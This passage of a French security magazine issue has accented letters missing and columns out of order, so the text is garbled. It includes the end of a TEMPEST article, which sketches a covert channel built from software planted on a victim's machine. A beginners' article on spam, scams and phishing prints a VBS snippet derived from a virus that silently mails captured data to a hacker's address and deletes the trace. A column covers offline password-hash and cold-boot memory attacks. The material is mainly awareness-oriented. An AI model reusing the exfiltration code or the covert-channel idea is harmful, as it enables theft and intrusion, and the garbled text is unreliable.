Nous savons comment forcer le moniteur pour gnrer une note concrte qui peut tre reue par une simple radio. Nous savons qu'il est possible de jouer une mlodie au moyen du moniteur. Quelles en sont les conclusions ? Est-ce que TEMPEST n'est qu'un jouet dans les mains d'un dbutant ? La Figure 8 montre qu'il y a autre chose. Lors de la gnration des notes dfinies par le moniteur, nous rduisons le spectre du signal envoy. Il n'est alors pas ncessaire que la bande de notre rcepteur soit trs large comme auparavant. L'image peut tre cre suffisamment bien sur le moniteur TEMPEST depuis le moniteur initial. Il est galement possible d'employer un amplificateur. En fonction de notre approche, il existe deux solutions :
Le coeur du circuit est constitue de la partie de traitement du signal de haute frquence et du dmodulateur. Si le coeur travaille correctement et efficacement, nous pouvons nous occuper de son entourage. Il ne faut pas augmenter de l'adrnaline sans cesse car le coeur lchera la fin : soit le circuit de traitement du signal de haute frquence soit les trajets de vision du moniteur seront brls. Mme si nous sommes incapables de recrer une image affiche, il est possible de charger un logiciel sur l'ordinateur attaqu qui affichera des images pour deux notes diffrentes (par exemple, 300Hz et 1200Hz) pendant l'absence de l'utilisateur, ce qui crera ainsi une modulation avec le masquage de la frquence. Ajoutons en plus le codage du signal et nous obtiendrons ainsi un canal de communication silencieux qui nous servira envoyer des informations binaires avec une frquence de rafrachissement de l'cran (par exemple, 60b/s). ukasz Maciejewski
L'auteur fait ses tudes l'Ecole Polytechnique de Wroclaw. Il est charg de concevoir des systmes de gestion des rseaux tltechniques. Actuellement, il travaille dans une socit charge des systmes lectroniques de scurit. Contact avec l'auteur : LukaszMaciejewski@pro-alert.pl 3/2009 HAKIN9 69
CONOMISEZ
22%
Hakin9 Comment se dfendre est le plus grand Bimestriel en Europe traitant de la scurit informatique. Vous trouverez dans nos pages des articles pratiques sur les mthode offensives et dfensives. Vous profiterez de programmes, de tutoriels, et de vidos pratiques.
Avec notre abonnement 35 EUR :
Vous conomisez 22% Vous recevez rgulirement les magazines votre domicile ! Vous obtenez un des nombreux cadeaux !
Choisissez votre propre mode dabonnement : par fax au numro : +31 (0) 36 530 71 18 par courrier : EMD The Netherlands Belgium P.O. Box 30157, 1303 AC Almere, The Netherlands par courrier lectronique : software@emdnl.nl par notre internet en ligne : http://www.hakin9.org/prt/view/abonnez-vous.html
BULLETIN DABONNEMENT
comment se dfendre
Merci de remplir ce bon de commande et de nous le retourner par fax : +31 (0) 36 540 72 52 ou par courrier : EMD The Netherlands Belgium P.O. Box 30157 1303 AC Almere The Netherlands Tl. +31 (0) 36 530 71 18 E-mail : software@emdnl.nl
Prnom/Nom ........................................................................................ Entreprise ............................................................................................. Adresse ................................................................................................. ................................................................................................................ Code postal .......................................................................................... Ville ........................................................................................................ Tlphone ............................................................................................. Fax ......................................................................................................... Je souhaite recevoir l'abonnement partir du numro .................... ................................................................................................................ En cadeau je souhaite recevoir ....................................................... ................................................................................................................ E-mail (indispensable pour envoyer la facture) ................................ ................................................................................................................
PRIX DABONNEMENT HAKIN9 COMMENT SE DFENDRE : 35

Je rgle par : Carte bancaire n CB
code CVC/CVV
Abonnez-vous et recevez un cadeau !
expire le _______________ date et signature obligatoires type de carte (MasterCard/Visa/Diners Club/Polcard/ICB)
Virement bancaire :
Nom banque : ABN AMRO Bank Randstad 2025 1314 BB ALMERE The Netherlands banque guichet numro de compte cl Rib 59.49.12.075 IBAN : NL14ABN0594912075 Adresse Swift (Code BIC) : ABNANL2A
DBUTANTS
SICCHIA DIDIER
Comment viter le SPAM,

le SCAM et les attaques phishing
Auparavant, il fallait attendre patiemment la venue du facteur afin de recevoir des nouvelles de ses proches, disperss aux quatre coins de la plante. Les services postaux disposaient alors du monopole absolu sur la distribution du courrier et des colis. Vint alors la (e)rvolution !
Degr de difficult

Cet article explique les techniques propres aux spams, scams et les attaques par phishing. Nous expliquerons aussi les mthodes utilises par les pirates afin de constituer des listes importantes d'adresses lectroniques. Enfin, la conclusion se consacre aux moyens d'viter l'ensemble de ces messages indsirables.

Comprhension basique du rapport lectronique sur internet. Usage traditionnel d'une messagerie lectronique. 72 HAKIN9 3/2009
ffectivement, internet est venu bouleverser cette habitude d'une autre poque. Aujourd'hui et sur la toile mondiale, ce sont des milliards de courriers lectroniques qui se distribuent chaque jour une vitesse blouissante. Les mails permettent de simplifier largement les changes d'informations et rduisent considrablement les dlais d'attente entre deux protagonistes. Nanmoins, cette merveilleuse possibilit de communiquer avec son prochain n'est pas toujours idale. Auparavant, si les botes aux lettres se remplissaient d'une foultitude de revues publicitaires parfois inutiles et encombrantes, l'quivalent lectronique rencontre la mme problmatique. Beaucoup de courriels se composent essentiellement d'un message attractif afin de sensibiliser les internautes sur un produit quelconque (parfois mensonger). Si on ne fait pas attention, une messagerie lectronique peut devenir une vraie poubelle. Justement, ces courriers lectroniques ont trouv une nouvelle dfinition et selon notre poque. Ainsi, nous parlerons plutt de pourriel (lgante association de mots) ou encore de spam (de l'anglais, pt). Le terme polluriel est plus rarement utilis mais il se rencontre nanmoins en certaines occasions.
Dfinition du SPAM
Le premier pourriel (ou spam) a t envoy le 3 mai 1978 par Gary Thuerk, agent du marketing travaillant chez DEC. Selon l'anecdote, Gary envoya son message la totalit des utilisateurs d'ARPANET (anctre de l'internet) vivant sur la cte ouest des tats-Unis (soit environ 600 personnes). Souhaitant judicieusement se faciliter la tche, il mit l'ensemble des adresses directement dans le champ destinataire. Bien qu'il fit cela sans mauvaise intention et simplement afin d'inviter des personnes technophiles une dmonstration DEC, il dclencha une vive contestation. Nanmoins, l'administration amricaine grant le rseau condamna largement la pratique, la jugeant non-conforme aux termes d'utilisation du rseau et l'thique : une autre poque ... une autre politique. Aussi surprenant que cela puisse parratre, les Monty Python ont leur part de responsabilit dans la cration du terme spam. Effectivement, dans un de leurs plus clbres sketches (vu dans l'mission Monthy Python Flying Circus), ils sont dguiss en vikings amateurs de pt et ructent une chanson interminable et insupportable dont les paroles se rsument en un seul mot : spam spam spam (ce sketch illustre merveille le flau lectronique). L'appt du gain facile ou malhonnte est dsormais au coeur de la cybercriminalit. Lors, le spam joue sur cette corde sensible afin d'aboutir son objectif (comprendre
Explications relatives aux diffrents termes
Afin de bien comprendre cet article, il faut dàbord expliquer la signification de cerains termes.
VITER LE SPAM
l'accumulation d'adresses lectroniques). Les promesses sont allchantes et les crdules ne manquent pas. Par exemple, durant les derniers mois de l'anne 2008, on pouvait recevoir une invitation bien sympathique via sa messagerie lectronique. Effectivement, les tablissements Google se proposaient de partager gnreusement avec l'ensemble des internautes des sommes d'argent importantes (et malgr la crise du moment). Ce mail a circul trs largement sur le rseau des rseaux (il existe aussi plusieurs variantes reprenant le corps du message mais disposant d'une autre provenance comme Microsoft par exemple) : Sujet : Google a 10ans Madame, Monsieur, Nous avons le plaisir de vous informer que Google France ftera ses 10 annes dexistence en janvier 2008. A cette occasion, suite aux retombes conomiques formidables engranges, Google voudrait remercier les internautes, sans qui, cette merveilleuse aventure naurait pas tait possible. Google offrira donc pour 45 euros de matriel informatique toutes les personnes qui feront suivre ce mail au moins 10 contacts diffrents, avec la mention Google a 10 ans en objet. La somme est cumulable sur plusieurs tranches de 10 contacts. Par exemple, si vous envoyez le mail 30 contacts, vous recevrez 135 euros. Vous recevrez sous 3 semaines un code 12 chiffres, vous permettant dimprimer votre bon dachat en ligne. Le service de logistique oprationnelle informatique de Google dtectera automatiquement les personnes qui envoient ce mail, avec la mention gagnante en objet, et ce texte en corps de mail. Merci de votre participation. fraude 419). Voici un modle du genre (vous remarquerez la manipulation psychologique intressante) : De:****** Tel:***-******** Courriel: ****@yahoo.com Bonjour, Je m'appelle ****** je suis g de 26 ans et je vis en Cte d'Ivoire. Malheureusement comme vous le savez mon pays traverse une priode trs difficile ce qui m'a contraint fuir ma rgion d'habitation qui est Bouak (dans le centre du pays). Mon pre tait un marchand de cacao trs riche Abidjan, la capitale conomique de la Cte d'Ivoire. Avant qu'il n'ai t grivement bless par les rebelles, urgemment conduit l'hpital il m'a fait savoir qu'il avait dpos 5 000 000 $ dans une mallette dans une socit de scurit base Abidjan. A l'annonce de la mort de mon pre je me suis prcipit dans sa chambre dans le but de prendre tout ce qu'il avait comme document administratif, j'ai dcouvert le certificat de dpt dlivr par la compagnie de scurit mon pre. Une fois arriv Abidjan j'ai essay de vrifier la validit de ce document. Le directeur de la socit m'a confirm l'existence de cette mallette dans leur tablissement. De peur de perdre cet argent, je sollicite l'aide de quelqu'un afin de transfrer ce seul bien que mon pre m'a lgu dans un pays tranger pour investir car la situation en Cte d'Ivoire est toujours incertaine. Une fois le transfert effectu je me rendrai l-bas pour rcuprer cet argent et y faire ma vie. Si vous tes prt maider, envoyer moi vite une rponse afin que lon puisse trouver un conciliabule. Dans lattente dune suite favorable recevez mes salutations et que dieu vous bnisse. PS: N'oubliez pas de me contacter directement mon adresse priv: ****@yahoo.com Une romance scam est un type de scam (ou arnaque) o un tranger prtend avoir des sentiments amoureux l'gard de sa victime. L'arnaqueur utilise alors cette affection afin d'accder au compte bancaire d'une manire ou d'une autre. Selon les habitudes, la plupart de ces arnaques semblent provenir d'Afrique de l'Ouest, principalement du Nigeria pour les arnaques en anglais et de Cte d'Ivoire pour celles en franais. De plus, ce genre de tromperie peut aussi s'effectuer par l'intermdiaire de sites de rencontre. Des jeunes femmes souvent
Listing 1. Code VBS pour automatiser la capture des adresses internet.

' Cration d'une nouvelle occurrence. Set new_cpt = OutlookApp.CreateItem(0) new_cpt.To = hacker@hotmail.com new_cpt.Subject = capture address new_cpt.Body = Gotcha! ' On efface l'information relatif l'envoi. new_cpt.DeleteAfterSubmit = True new_cpt.Send
originaires d'Europe de lEst (Ukraine et Russie) oprent selon cette sinistre mthode. Pour comprendre simplement, la romance scam repose sur la cration de liens affectifs et fait appel aux motions naturelles. A cet effet, un des leaders mondiaux dans le domaine de la scurit informatique a publi durant le mois d'octobre 2008 une enqute sur les douze principaux pays partir desquels des campagnes massives (spam et scam confondu) ont t mises au cours du troisime trimestre de 2008. Ces rsultats sont fonds sur lanalyse de lensemble des messages curieux reus par leur rseau mondial de piges (en anglais, Honey Pot). Ils rvlent une hausse inquitante du pourcentage des messages accompagns dune pice jointe malveillante, ainsi quune augmentation des attaques sappuyant sur des techniques dingnierie sociale afin de tromper les destinataires. Les concepteurs de ces mails s'chinent rendre ces courriers vraisemblables afin de constituer une crdibilit toute artificielle. Considrons quelques exemples pertinents et rcents. Peut-tre mme reconnaitrez-vous la substance d'un message prcdemment reu dans votre messagerie lectronique. Sur le seul troisime trimestre 2008, La principale attaque concernait le cheval de
Dfinition du SCAM
Il existe aussi une variante grave aux pourriels (spam): Le scam. Cela commence par un message lectronique dans lequel quelqu'un vous demande gentillement d'envoyer de l'argent liquide afin de pouvoir dbloquer une norme somme d'argent quelconque. En change de votre bont, vous recevrez une solide rcompense. Bien sr, tout est faux. Il s'agit d'une arnaque qui contrevient l'article de loi nigrian 419 (d'o l'expression,
Figure 1. Une conserve originale de SPAM

3/2009 HAKIN9 73
DBUTANTS
Troie Agent-HNY, camoufl en jeu darcade Penguin Panic pour iPhone Apple. Parmi les autres incidents majeurs figurent le troyen EncPk-CZ, qui se faisait passer pour un correctif Microsoft et le malware Invo-Zip (faux avis du transporteur FEDEX). Ainsi, les utilisateurs de Windows ouvrant ces pices jointes exposaient leur PC un risque dinfection important, mettant potentiellement leur identit lectronique en pril. Ces principales attaques ne sont conues que pour fonctionner sous Windows. Pour les inconditionnels dApple Mac et dUnix, ces attaques massives ne se sont traduites que par la saturation de leur messagerie, sans risque dinfection de leur systme. Le courrier se composait ainsi (notez le souci de crdibilit afin de gruger le destinataire. Le fichier joint tait ce malware nonc prcdemment) : Subject: Tracking N <some random digits> Unfortunately we were not able to deliver postal package you sent on <Month> the <date> in time because the recipients address is not correct. Please print out the invoice copy attached and collect the package at our office Your FEDEX S'il est facile de comprendre l'ambigut d'une pareille information, il faut bien reconnatre que les novices risquent de tomber dans le pige. La vocation d'une distribution massive d'un courrier lectronique est de nature diverse. Gnralement, elle repose simplement sur trois alternatives que nous placerons dans un ordre de malveillance : publicit pour un produit quelconque, propagation d'un virus ou d'un malware, tentative d'usurpation d'identit ou phishing.
Tableau 1. Les 12 pays d'o proviennent massivement les campagnes de SPAM Position Etat-Unis Russie Turquie Chine + Hong-Kong Brsil Core du sud Inde Argentine Italie Royaume Uni Colombie Thalande Autres pays Pourcentage 18,9 8,3 8,2 5,4 4,5 3,8 3,5 2,9 2,8 2,7 2,5 2,4 34,3
Le Malware
La diffrence entre un virus et un malware repose sur la vocation de celui-ci. Si un virus a simplement pour objectif de nuire de la manire la plus sinistre possible, un malware est dvelopp afin de profiter d'un ordinateur cible. Par exemple, il peut permettre un pirate de rentrer dans un ordinateur afin de lire (tlcharger aussi) des donnes importantes. Il peut encore espionner vos habitudes sur internet afin d'tablir un cahier reprsentatif comme un sondage. En d'autres termes et d'une manire image, si un virus est semblable une brique dans la vitrine d'une boutique, le malware cherche plutt la furtivit comme un voleur tapi dans l'ombre.
Le Phishing
Le phishing (en franais, hameonnage ou filoutage) est une technique utilise par des fraudeurs afin d'obtenir des renseignements personnels dans le but de perptrer une usurpation d'identit. La technique consiste faire croire la victime qu'elle s'adresse un tiers de confiance (banque, administration, eBay, PayPal, etc). L'objectif est de soutirer des renseignements personnels comme les mots de passe, les numros de carte de crdit, etc. Cette forme d'escroquerie repose essentiellement sur l'ingnierie sociale et ne rclame que peu de connaissance informatique. Le terme phishing aurait t invent par des pirates et serait construit sur l'expression anglaise password harvesting fishing (comprendre pche aux mots de passe). Typiquement, les messages ainsi envoys semblent maner d'une socit digne de confiance et sont formuls de manire ne pas alarmer le destinataire afin qu'il effectue une action en consquence. Une approche souvent utilise est d'indiquer la victime que son compte a t accidentellement dsactiv et que la ractivation ne sera possible qu'en cas d'action immdiate de sa part. Le message fournit alors un hyperlien qui dirige l'utilisateur vers une page Web traditionnelle qui ressemble s'y mprendre au site original. Arriv sur cette page frauduleuse, l'utilisateur est invit saisir des informations confidentielles qui sont alors enregistres par les criminels.
Figure 2. Fausse page du portail FREE

74 HAKIN9 3/2009
VITER LE SPAM
Certains penseront peut-tre que la technique ne peut pas rellement marcher ... et pourtant! Il vous suffira de rechercher sous Google les informations relatives aux rcentes affaires criminelles propres cette technique. On retrouve plemle des histoires relatant des sommes astronomiques pouvant dpasser des millions de Dollars, ainsi que des noms d'entreprises prestigieuses (que nous tairons afin de ne pas nuire leur crdibilit). Nanmoins, un mail fait actuellement le tour des botes de messagerie FREE afin d'inviter labonn quelconque fournir ses coordonnes personnelles attaches son compte. La page contrefaite est particulirement bien compose. Le pige s'est dj referm de nombreuses fois sur les internautes FREE insouciants. Ainsi, vous l'aurez compris, le problme est important d'autant plus qu'il semble se produire actuellement un accroisement des attaques de cet acabit. Or, nous n'avons pas choisi cet exemple pour rien ou par hasard. Si vous tes quelque peu observateur (et bon lve), vous aurez remarqu le nombre important de fautes d'orthographe et de grammaire dans la composition de cette fausse page FREE (plus de 10). Malheureusement, c'est parfois le seul moyen de se faire une juste opinion lorsqu'il se prsente un certain quivoque. Lors, ajoutons notre vigilance une bonne perception de l'astuce. Expliquons les mcanismes profonds de la manoeuvre criminelle. En premier lieu, il convient de constituer une liste consquente avec des adresses internet. Afin de parvenir un rsultat exploitable, il existe globalement 3 possibilits. profiter d'un rseau social, acheter une liste d'adresses auprs d'un professionnel, utiliser un programme de capture d'adresses. de quelqu'un ou une information relative un problme grave. Malheureusement, cette possibilit de communiquer avec d'autres permet certaines personnes de constituer des rseaux sociaux sans relles nobles motivations. Illustrons cette mthode par un exemple vcu durant la dernire semaine de l'anne 2008. Voici la nature du mail (les fameuses chanes de l'amiti). Notez la crdibilit du propos faisant rfrence un problme viral important (encore une fois, l'orthographe subit quelques entorses) : ATTENTION si un de vos contact vous propose un lien ou cèst crit: foto, puis le lien finissant par votre adresse msn surtout ne l'ouvrez pas ceci est un virus !!! Ce n'est pas votre contact qui l'envoie c'est un pirate qui a russi a entrer dans son "MSN". Envoie ce message a tous tes contacts MSN avant que le virus ne se propage!!! En finalit, de pareils mails circulent dans le monde entier et finissent par tomber dans des messageries lectroniques piges rcoltant ainsi des centaines de listes de contacts. Un seul exemplaire peut parfois contenir des centaines d'adresses d'internautes valides (voire un millier). De cette faon, il est trs facile de se constituer rapidement une liste afin d'automatiser une attaque de grande invergure. D'ailleurs, mme si la motivation originale n'tait pas de nuire, le principe voqu profitera immanquablement d'autres, beaucoup moins scrupuleux.
Acheter une liste d'adresses mail

Il existe sur internet de nombreuses socits qui proposent la vente des listes d'adresses de messagerie lectronique. La vocation de ces entreprises est directement lie une espce de marketing moderne et essentiellement attach cet outil qui est internet. Il faut bien reconnatre que la toile mondiale est une vitrine potentiellement trs attractive. Le commerce lectronique gnre des milliards de dollars chaque jour et dans le monde entier. Ainsi, celui qui dispose d'une large liste d'adresses peut touch une clientle trs importante ( moindre frais d'ailleurs). Certaines listes se composent de plusieurs millions d'adresses et elles se partagent selon diffrents critres propres l'internaute quelconque. Ainsi, il est possible de consacrer une campagne de communication seulement en direction des sniors ou des femmes, par exemple. Or, sommes-nous toujours dans la lgalit ? Selon quels accords ces entreprises retiennent-elles ces adresses d'internautes ? Pour rpondre cette question, nous avons tent de contacter plusieurs socits dont l'activit se consacre dvelopper pour un quidam une campagne de communication grce internet et seulement via les messageries lectroniques. Malheureusement, aucune rponse de collaboration ne nous est parvenue. Cela traduit bien le caractre ambig de la
Les techniques de constitution des listes d'adresses
Il existe plusieurs techniques de constitution des listes dàdresses.
Profiter d'un rseau social

Qui n'a jamais reu un mail dont l'objectif est de sensibiliser le lecteur la dtresse Figure 3. Logiciel de capture email en action
3/2009 HAKIN9 75
DBUTANTS
situation. Un flou juridique permet encore actuellement beaucoup de drives qui se traduisent souvent par des campagnes de spam massives. Ces socits proposent des listes d'adresses selon la dnomination optin. Or, qu'est-ce que cela sous-entend exactement. Une liste opt-in est compose essentiellement avec des adresses lectroniques dont les dpositaires acceptent de recevoir les informations et les offres des partenaires. A l'inverse, les adresses opt-out constituent un refus de partage absolu. Ajoutons, que la loi franaise "informatique et liberts" du 6 janvier 1978 impose toujours la dclaration auprs de la CNIL des fichiers d'adresses lectronique et une collecte loyale des susdites adresses est considre comme parfaitement dloyale la collecte des adresses dans les chats, forums de discussion, listes de diffusion, annuaires, sites web et sans que les personnes concernes n'en aient connaissance aucune. Lors, comment prouver qu'une liste vendue est vritablement compose essentiellement avec des adresses optin ? Le flou persiste. De ce constat, on distingue quatre formules d'inscription une liste de diffusion :
opt-in actif : l'internaute doit
volontairement cocher une case pour que son adresse soient utilise ultrieurement des fins commerciales, opt-in passif : une case est dj prcoche (position affirmative). L'accord de l'internaute est explicite, opt-out actif : Il faut cocher une case pour ne pas recevoir de message ultrieurement (on considre l'accord de l'internaute comme acquis par dfaut), opt-out passif : L'internaute est automatiquement inscrit une liste de diffusion sans qu'il ait la possibilit de changer cela au moment de l'inscription.
lectroniques afin de constituer sa campagne de spam, de scam ou de phishing. Ces susdites personnes composent une liste consquente grce quelques programmes ingnieux (parfois payant selon efficacit) dont la vocation est de trouver les adresses figurant dans des pages Web. Ajoutons encore que les changes sont possibles, voire mme encourags. Note : Nous n'avons pas encore voqu la menace virale. Par exemple, une simple drive du virus AnnaKournikova (vbs) permettrait de rcolter une masse d'informations importantes puisqu'il est bas justement sur une rplication selon le carnet d'adresses du programme OutLook Express. Il suffit de commander l'envoi d'un mail vers une adresse de rtention. Voici une portion du code selon la modle classique ( placer simplement en fin de fonction DoMail puisque l'applet OutLook est dj vacant) (voir Listing 1). A cet effet, selon plusieurs analystes en scurit informatique, le virus Sober.q (dont les propos suggrs une motivation seulement politique) serait en vrit une carte de visite pour spammeurs. Celui-ci se servait des ordinateurs infects afin d'tendre les campagnes de spam. L'ingniosit ne manque pas dans ce milieu puisqu'il apparat de nombreuses variantes et autres alternatives afin de contourner la vigilance des antivirus. Par exemple, les messages ne sont plus rdigs au format texte mais ils se distribuent plutt en fichiers de type MP3.
Utiliser un programme de capture des adresses

Imaginez le nombre des adresses lectroniques circulant librement sur internet. Qu'il s'agisse des rseaux sociaux, des forums de discussion, des listes d'amis, des blogs, des liens de correspondance (et encore bien davantage), il est trs facile de constituer une liste importante avec des adresses quelconques. Ces programmes de capture ne rclament qu'une visite des pages Web intressantes afin de se saisir des prcieuses informations. Ds lors, si une opration de phishing doit seulement se consacrer un service franais (banque, vente en ligne ou administration par
exemple), le pirate se cantonnera parcourir les sites internet du pays. Il est toujours possible d'implmenter un filtre de faon ne garder que les adresses relatives au portail cible (par exemple, hotmail ou FREE pour revenir sur notre prcdent modle). A cet effet, il existe une foultitude de logiciel de cet acabit, certains payants et d'autres gratuits. La combinaison de plusieurs postes de travail ajoute la composition des listes. De cette faon, une liste de plusieurs millions d'adresses et plus qu'envisageable. Une recherche par script automatis est aussi effectue par plusieurs groupes de distribution. Voici une liste non-exhaustive de programmes afin de capturer les adresses internet. Le logiciel Izi Capture (sous Windows essentiellement) est dconcertant de simpliciter. Sur la base d'une seule requte (car il fonctionne grce au moteur de recherche google), il permet de trouver un nombre important d'adresses lectroniques. Puisqu'il s'agit d'un rsultat selon indexation, le produit final de la recherche est trs rduit. Il permet donc de se consacrer un type d'utilisateur particulier. En d'autres termes, une recherche avec le mot counter-strike donnera une liste d'adresses lectroniques trs diffrente d'une recherche avec les mot pOrn. Ce logiciel de capture d'adresses lectroniques est ultra rapide. Selon les dvellopeurs de l'application, ce logiciel permet de lire jusqu' 64 pages internet en mme temps (en ADSL). Ainsi, un pirate dispose d'une arme efficace afin de cibler une groupe d'utilisateurs dtermin. Sur le site officiel, on peut tlcharger une version d'valuation (comptez 100 euros pour concrtiser l'achat). Encore une fois, c'est le cordonnier le plus mal chauss puisqu'une recherche Tableau 2. Quelques applications de capture d'adresses internet ListEmail Pro 5.01 Captimails MailingBuilderPro Izi Capture AnnuCapt AspiMail E-Capture pro
De plus, internet fourmille de personnes peu scrupuleuses dont les services (sous le manteau) se moque bien de la lgalit et du respect d'autrui. Ainsi, moyennant quelques dizaines d'euros, il est possible d'acheter une liste d'adresses
76 HAKIN9 3/2009
VITER LE SPAM
via le mot cl hakin9 affiche en finalit 10 adresses lectronique. Crer une ou plusieurs adressesjetables servant uniquement s'inscrire ou s'identifier sur les sites jugs non dignes de confiance. victimes, comprendre un got prononc pour l'argent ou les charmes exotiques. Que ce soit une armada de systmes de filtrage des courriers lectroniques, un mur de pare-feux, une foultitude d'antivirus ou de logiciels anti-spam, rien ne saurait tre plus efficace que le bon sens, la retenue, l'information et la vigilance. En finalit, nous dirons que les campagnes de spam, scam et les attaques par phishing sont un vritable flau pour la communaut internationale des cybernautes. Certains estimeront cette affirmation est exagre. En vrit, ces passages de courriers nuisibles polluent l'internet. Les inconvnients majeurs du spam sont : l'espace qu'il occupe dans les botes aux lettres des victimes, l'augmentation du risque de suppression errone ou de non-lecture de messages importants, le caractre violent ou dgradant de certaines images ou textes, la bande passante gaspille sur le rseau des rseaux, la mise en place de systmes antispam onreux et parfois lourd, le surcot des abonnements internet (formation du personnel, sensibilisation des utilisateurs, mise en place de structures de filtrage importantes, etc).
Conclusion
Certes, nous n'avons pas encore voqu l'essentiel: la mathmatique de la chose. Le secret de ces diffrentes mthodes d'arnaque repose essentiellement sur la crdulit de quelques-uns. Ainsi, l'objectif d'un pirate est de trouver ces personnes naves. Si la (mal)chance ne suffit pas, c'est la mathmatique de base qui intervient. En d'autres termes, plus la liste est large et plus la probabilit de trouver une victime est importante. En imaginant que seulement 0.001% des courriers lectroniques trouve un echo favorable, cela sous-entend 10 personnes vulnrables dans une liste de 1 000 000 d'adresses. C'est ainsi que fonctionne l'esprit de ces criminels. Afin de se protger efficacement contre les spams, scams et autres attaques par phishing, il convient de veiller au partage de ses informations confidentielles : Ne pas relayer les messages (courrier du coeur, Hoax, etc) invitant l'utilisateur transmettre le courrier un maximum de contacts possible. Eviter au maximum de publier son adresse lectronique sur des forums ou des sites internet. Remplacer son adresse lectronique par une image (non dtectable par les logiciels de capture d'adresses). Dcomposer son adresse lectronique, par exemple didier point sicchia arobase free point fr.
De plus, il se dveloppe sur internet une communaut particulirement motiv afin de lutter contre les scams en tout genre et de manire active. Ainsi, les scambaiters (ou croques-escrocs en franais) essaient de faire perdre un maximun de temps et d'nergie aux arnaqueurs, notamment en laissant croire qu'ils sont des victimes potentielles. De ce fait, un jeu psychologique intressant s'installe entre les protagonistes. Les scambaiters rpondent aux mails envoys par les escrocs, ceux-ci dveloppent une argumentation plus profonde, les scambaiters rpondent encore, les arnaqueurs rpliquent, etc. Lors, ces changes peuvent durer des semaines entires (voire des mois) sans apporter le moindre profit aux escrocs. L'arroseur est arros ! Vritable phnomne de socit, le spam dans ces attributs les plus larges s'analyse aussi comme un oeuvre d'art contemporain, une image atypique de notre systme de valeur. Certes, la technologie dveloppe un certain confort mais qui ne sait encore convenir pleinement l'ensemble de nos dsirs lgitimes. L'expansion du scam dmontre bien la fragile propension que nous avons manifester de la vigilance lorsque nos motions l'emportent. Effectivement, le principe repose trs largement sur la seule faiblesse des
Sur Internet

Dfinition et explication selon l'encyclopdie Wikipdia : http://fr.wikipedia.org/wiki/Pourriel Le spam selon les Monty Python (vido du sketch) : http://www.youtube.com/ watch?v=anwy2MPT5RE Le rapport Sophos sur le spam en 2008 : http://www.sophos.fr/pressoffice/news/articles/ 2008/10/spamreport.html Fiche d'information relatives au spam Google (hoax) : http://www.hoaxkiller.fr/hoax/2007/ google_10_ans.htm Portail du logiciel de capture d'adresses lectroniques : http://www.izimailing.com/logicielcapture-adresses-emails.htm Portail francophone contre le spam, le scam et le phishing (beaucoup d'archives et de tmoignages) : http://www.croque-escrocs.fr Portail important de lutte active contre les scams et autres arnaques virtuelles : http://www.thescambaiter.com Les diffrentes lois contre le spam (et dans le monde entier) : http://www.arobase.org/spam/ comprendre-regulation.htm
Beaucoup d'applications offrent la possibilit de bloquer (en partie) les messages indsirables. Ceci se fait avec plus ou moins d'efficacit d'ailleurs. Or, mme si on parvient liminer les spams et autres scams, il convient d'tre toujours vigilant face aux attaques par phishing. A dfaut de rpondre toutes les questions, cet article nous aura clairer sur le sujet et les mthodes des pirates.
Sicchia Didier
Il est l'origine de nombreux exploits, dossiers et articles divers pour plusieurs publications francophones consacres la scurit informatique et au dveloppement. Autodidacte et passionn, son exprience se porte notamment sur les ShellCodes, les dbordements d'allocations de mmoire, les RootKits, etc. Plus que tout autre chose, c'est l'esprit alternatif de la communaut UnderGround qui le motive. Afin de contacter l'auteur : didier.sicchia@free.fr 3/2009 HAKIN9
77
FEUILLETON
Les attaques hors-ligne

Comment lever ses privilges avec un tournevis ? l'heure o l'on parle de plus en plus couramment de virtualisation et de rootkits, certaines vulnrabilits, bien physiques celles-ci, connaissent une seconde jeunesse au travers de travaux de recherche rcents.
a mthodologie est simple : partir d'un accs physique un ordinateur, l'attaquant rcupre des donnes critiques (authentification, etc.), qui auraient t difficilement accessibles par le rseau. Cette mthode est utilise depuis bien longtemps par les administrateurs systmes et autres techniciens en maintenance informatique, afin de dbloquer des ordinateurs dont le mot de passe aurait t oubli, mais est ici dtourne des fins d'intrusion. Ainsi, partir du disque dur systme d'une machine Windows, il est souvent trivial de rcuprer la liste des empreintes des mots de passe [1], puis de casser ces dernires [2], au moyen de Rainbowtables par exemple. La mme attaque peut tre ralise directement sur les fichiers reprsentant les disques durs des machines virtuelles [3], transformant l'attaque physique en attaque logique, mais arrivant aux mmes rsultats. noter qu'une personne rellement malintentionne ne se contentera sans doute pas d'extraire des informations, mais pourrait trs bien injecter du code ou des logiciels malveillants son propre avantage (porte drobe, etc.). Ces dernires annes, des contremesures ont vu le jour, notamment chez Microsoft qui, partir de Windows Vista, a intgr le systme Bitlocker pour raliser du chiffrement de disque la vole et ainsi empcher toute rcupration
78 HAKIN9 3/2009
d'informations par une attaque hors-ligne. Mais quid de la mmoire vive ou des fichiers d'hibernation ? Si ces derniers sont en effet protgs par le chiffrement complet du disque quand Bitlocker est activ, ils n'en restent pas moins explorables le reste du temps [4] tout comme le contenu d'une image de la mmoire vive, contenant certes l'ensemble des processus en cours d'excution au moment de la capture, mais galement quelques mots de passe... et cls de chiffrement ! Des tudiants de Princeton se sont d'ailleurs penchs sur la rmanence des informations dans nos chres barrettes de mmoire vive [5], bousculant par la mme occasion toutes les ides reues
qui laissaient penser que la mmoire se vidait instantanment aprs la perte de l'alimentation lectrique. En fait, il est possible de rcuprer des informations plusieurs secondes, voire plusieurs minutes aprs l'extinction d'un ordinateur, si l'on refroidit suffisamment les composants de la mmoire immdiatement aprs l'arrt total. partir de l, rien n'empche de raliser une extraction des donnes et d'appliquer les mthodes prcdemment cites. Comme quoi il existe encore et toujours des vulnrabilits contre lesquelles les pare-feu, IDS/IPS et autres sondes vendues hors de prix ne seront d'aucun secours...
Julien Raeis
Il est consultant en scurit franais travaillant chez HSC (Herv Schauer Consultants - http://www.hsc.fr/). Il ralise des audits, tudes, tests d'intrusion et des formations aux tests d'intrusion. Julien remercie toute l'quipe HSC pour son aide et ses relectures. Julien peut tre contact l'adresse suivante : Julien.Raeis@hsc.fr.
Rfrences
http://sourceforge.net/projects/ophcrack/ [1] http://www.hsc.fr/ressources/articles/rdp_misc2/part1.htm [2] http://www.vmware.com/interfaces/vmdk.html [3] http://sandman.msuiche.net/ [4] http://citp.princeton.edu/memory/ [5] http://storm.net.nz/projects/16 [6]
INTERVIEW
Interview dAnne-Galle Lunot

Anne-Galle Lunot, jeune entrepreneuse passionne qui a cr une socit de prestations informatiques Zlites.
